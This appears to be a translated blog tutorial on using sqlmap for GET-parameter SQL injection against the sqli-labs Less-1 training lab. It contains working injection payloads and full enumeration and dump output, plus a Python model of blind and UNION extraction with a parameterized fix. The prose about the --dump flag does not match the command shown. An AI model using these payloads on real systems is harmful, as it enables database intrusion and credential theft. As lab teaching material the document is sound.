How sqlmap Performs GET Injection
Posted by web安全工具库
Sometimes a person suddenly stops being happy,
suddenly seized by some small detail in memory,
suddenly sinking into a deep silence...
---- NetEase Cloud Music hot comment
1. Check whether the parameter is injectable
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1"
Result: the id parameter is injectable, and sqlmap found four usable techniques: boolean-based blind, error-based, time-based blind and UNION query. Without --batch sqlmap asks questions interactively (the [y/N] prompt below); add --batch to accept the defaults and -p id to test only that parameter. Detection took 51 requests, and the result is stored in the session under the output directory shown at the end, so later runs against the same URL skip detection and go straight to enumeration.
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3164=3164 AND 'mfxU'='mfxU
Type: error-based
Title: mysql >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1' AND GTID_SUBSET(CONCAT(0x7170787671,(SELECT (ELT(6170=6170,1))),0x7171707671),6170) AND 'OQBr'='OQBr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5125 FROM (SELECT(SLEEP(5)))KhmQ) AND 'FLCn'='FLCn
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3273' UNION ALL SELECT NULL,CONCAT(0x7170787671,0x6749526d50674c70454d46764779685973766f45787156766e574b6b7244554c6d697559506b6d54,0x7171707671),NULL-- -
---
[12:46:50] [INFO] the back-end DBMS is MySQL
web application technology: nginx 1.15.11, php 5.4.45
back-end DBMS: MySQL >= 5.6
[12:46:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
2. List the databases
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" --dbs
Output:
[12:55:26] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Nginx 1.15.11
back-end DBMS: MySQL >= 5.6
[12:55:26] [INFO] fetching database names
available databases [9]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] sys
[*] www_dgdg_com
[*] www_zm_com
[12:55:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
3. List the tables
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security --tables
-D selects the database
--tables lists its tables
Output:
[12:58:52] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.4.45
back-end DBMS: MySQL >= 5.6
[12:58:52] [INFO] fetching tables for database: 'security'
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
[12:58:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
4. List the columns
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security -T users --columns
-T selects the table
Output:
[13:01:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.4.45
back-end DBMS: MySQL >= 5.6
[13:01:32] [INFO] fetching columns for table 'users' in database 'security'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
[13:01:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
5. Dump the column contents
sqlmap -u "http://192.168.139.129/sqli/Less-1/?id=1" -D security -T users -C "password,username" --dump
--dump is a flag and takes no argument; the columns to dump are selected with -C. The run below was made with the column list placed after --dump instead, so it was not applied and every column was dumped, which is why id also appears in the table.
Output:
[13:04:07] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP 5.4.45
back-end DBMS: MySQL >= 5.6
[13:04:07] [INFO] fetching columns for table 'users' in database 'security'
[13:04:07] [INFO] fetching entries for table 'users' in database 'security'
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | p@ssword | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dumbo | dhakkan |
| 14 | admin4 | admin4 |
+----+------------+----------+
[13:04:07] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/security/users.csv'
[13:04:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
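The following Python model of Less-1 is an added example, not code from the original post or from sqlmap. It shows what the payloads listed in step 1 do to the query and why the boolean oracle works. It assumes Less-1 builds its query as SELECT * FROM users WHERE id='$id' LIMIT 0,1 (the query in sqli-labs; assumed here, not shown on this page) and echoes the first row's username and password. It uses an in-memory SQLite table holding a constructed subset of the rows dumped above. MySQL-only functions in the page's payloads (CONCAT, SLEEP, GTID_SUBSET) are replaced by SQLite's || or omitted, so only the boolean-blind and UNION techniques are reproduced; the hardened handler with a bound parameter is shown alongside.

```python
"""Model of sqli-labs Less-1 in SQLite, showing how sqlmap's GET payloads work.

Added example, not from the original post. Assumes Less-1 builds its query as
    SELECT * FROM users WHERE id='$id' LIMIT 0,1
and echoes username/password of the first row (assumption, not shown on the page).
"""
import sqlite3

# Constructed sample rows (id, password, username): a subset of the dump above.
USERS = [
    (1, "Dumb", "Dumb"),
    (2, "I-kill-you", "Angelina"),
    (8, "admin", "admin"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, password TEXT, username TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return con


def less1_page(con, id_param):
    """Vulnerable handler: the GET parameter is spliced into the SQL string."""
    sql = f"SELECT * FROM users WHERE id='{id_param}' LIMIT 0,1"
    row = con.execute(sql).fetchone()
    return "" if row is None else f"Your Login name:{row[2]} Your Password:{row[1]}"


def less1_page_fixed(con, id_param):
    """Hardened handler: bound parameter, so a quote in the payload is data, not syntax."""
    row = con.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (id_param,)).fetchone()
    return "" if row is None else f"Your Login name:{row[2]} Your Password:{row[1]}"


def boolean_oracle(page, con):
    """Return (oracle, counter) in the style of sqlmap's boolean-based blind check.

    The condition is wrapped as  1' AND (cond) AND 'mfxU'='mfxU  (the page's payload
    shape); oracle(cond) is True iff the response equals the untouched id=1 page.
    """
    baseline = page(con, "1")
    calls = {"n": 1}  # one request for the baseline

    def oracle(cond):
        calls["n"] += 1
        return page(con, f"1' AND ({cond}) AND 'mfxU'='mfxU") == baseline

    return oracle, calls


def is_injectable(page, con):
    """sqlmap's first test: a true and a false condition must yield different pages."""
    oracle, _ = boolean_oracle(page, con)
    return oracle("3164=3164") and not oracle("3164=3165")


def blind_extract(oracle, subquery, max_len=64):
    """Recover the scalar result of `subquery` one character at a time.

    Each character is located by binary search over printable ASCII (32..126),
    at most 7 requests per character, which is how blind dumps stay affordable.
    """
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({subquery}))>={pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def union_dump(page, con, user_id):
    """UNION ALL payload from the page, with SQLite's || in place of MySQL CONCAT().

    A non-existent id (-3273) empties the original row so the injected row is echoed.
    """
    payload = (f"-3273' UNION ALL SELECT NULL,username||':'||password,NULL "
               f"FROM users WHERE id={user_id}-- -")
    return page(con, payload)


if __name__ == "__main__":
    con = make_db()
    print("injectable:", is_injectable(less1_page, con))
    print("injectable (fixed):", is_injectable(less1_page_fixed, con))
    oracle, calls = boolean_oracle(less1_page, con)
    pw = blind_extract(oracle, "SELECT password FROM users WHERE id=8")
    print(f"blind: admin password = {pw!r} after {calls['n']} requests")
    print("union:", union_dump(less1_page, con, 8))
    print("union (fixed):", union_dump(less1_page_fixed, con, 8))
```

Run it directly to watch the boolean oracle confirm injection, the blind loop recover the admin password in a few dozen requests, the UNION payload echo a whole row in one request, and all three fail against the parameterized handler. The request count is the cost that sqlmap's technique ordering (UNION and error-based before blind) and its binary-search character retrieval are there to keep down.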
Illegal use is prohibited; you bear the consequences.